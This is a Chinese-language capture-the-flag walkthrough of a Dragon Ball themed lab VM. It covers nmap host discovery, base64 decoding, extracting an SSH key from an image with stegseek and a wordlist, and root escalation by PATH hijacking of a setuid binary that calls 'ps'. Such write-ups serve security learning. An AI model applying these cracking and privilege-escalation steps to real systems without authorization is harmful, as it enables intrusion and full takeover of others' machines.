文章目录
- 网段扫描
- 隐藏目录
- 隐写
- 尝试通过ssh连接
- 提权
- 路径劫持
网段扫描
nmap -sn 命令用于执行主机存活扫描,仅检测目标网络中的活动主机,而不进行端口扫描。
┌──(root㉿kali)-[~/Downloads]
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 23:55 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00033s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:E8:39:64 (VMware)
Nmap scan report for 10.10.10.11
Host is up (0.00035s latency).
MAC Address: 00:0C:29:D1:8E:56 (VMware)
Nmap scan report for 10.10.10.240
Host is up (0.00032s latency).
MAC Address: 00:50:56:E4:2E:A9 (VMware)
Nmap scan report for 10.10.10.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.10 seconds
直接访问10.10.10.11,成功,是一篇写龙珠的文章
查看源代码,在最下面发现base64编码
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d
UkZKQlIwOU9JRUpCVEV3PQ==
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d
RFJBR09OIEJBTEw=
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d| base64 -d
DRAGON BALL
访问robots.txt文件,敏感目录(即使没有目录扫描,也应该知道这个),也有一个base64编码
隐藏目录
提示:你要找到隐藏目录根据上面解码得到DRAGON BALL,联想到这是一个隐藏目录,访问
secret.txt中有十几个目录,但都访问不了
vulnhub文件夹中,有一张图片和一个登陆页面(登陆页面弱密码登陆不想,猜测图片有隐写)
隐写
··
┌──(root㉿kali)-[~/Downloads]
└─# binwalk aj.jpg DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01┌──(root㉿kali)-[~/Downloads]
└─# exiftool aj.jpg
ExifTool Version Number : 12.49
File Name : aj.jpg
Directory : .
File Size : 75 kB
File Modification Date/Time : 2021:01:05 06:09:29-05:00
File Access Date/Time : 2024:03:15 00:10:18-04:00
File Inode Change Date/Time : 2024:03:15 00:09:54-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 959
Image Height : 535
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 959x535
Megapixels : 0.513┌──(root㉿kali)-[~/Downloads]
└─# stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".通过stegseek,爆破出aj.jpg中存在id_rsa(ssh密钥)文件
尝试通过ssh连接
猜测用户名是DRAGON ,root,admin都不行,回头看看
发现xmen这个名字,尝试
登陆成功
提权
在script目录中发现demo.c和shell可执行文件,通过执行shell文件发现,shell的源码就是demo.c,因为demo.c调用了ps,所以想到更改ps内的文件或创建一个ps文件,使得demo.c调用我创建的ps文件
en@debian:~$ ls
local.txt script
xmen@debian:~$ cat local.txt
your falg :192fb6275698b5ad9868c7afb62fd555xmen@debian:~$ cd script/
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);setgid(0);system("ps");
}
xmen@debian:~/script$ ./shellPID TTY TIME CMD1176 pts/1 00:00:00 shell1177 pts/1 00:00:00 sh1178 pts/1 00:00:00 ps
路径劫持
首先创建ps,写入/bin/bash,当root用户执行时,就会创建一个root的交互页面,加权限,which ps发现ps是在/usr/bin下,echo $PATH输出环境变量路径,export PATH=.:$PATH将当前目录加到环境变量前,在进行echo $PATH,发现添加成功,which ps,调用ps时,会执行当前目录的ps文件,./script/shell 执行脚本,拿root权限
xmen@debian:~/script$ cd ../
xmen@debian:~$ echo "/bin/bash" >ps
xmen@debian:~$ chmod +x ps
xmen@debian:~$ ls
local.txt ps script
xmen@debian:~$ which ps
/usr/bin/ps
xmen@debian:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ export PATH=.:$PATH
xmen@debian:~$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ which ps
./ps
xmen@debian:~$ ./script/shell
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)
root@debian:~# cd /root
root@debian:/root# ls
proof.txt
root@debian:/root# cat proof.txt_____ __________ / \\______ \ ___ ___ _____ ____ ____ / \ / \| _/ \ \/ // \_/ __ \ / \
/ Y \ | \ > <| Y Y \ ___/| | \
\____|__ /____|_ /__________/__/\_ \__|_| /\___ >___| /\/ \/_____/_____/ \/ \/ \/ \/ join channel: https://t.me/joinchat/St01KnXzcGeWMKSCyour flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2
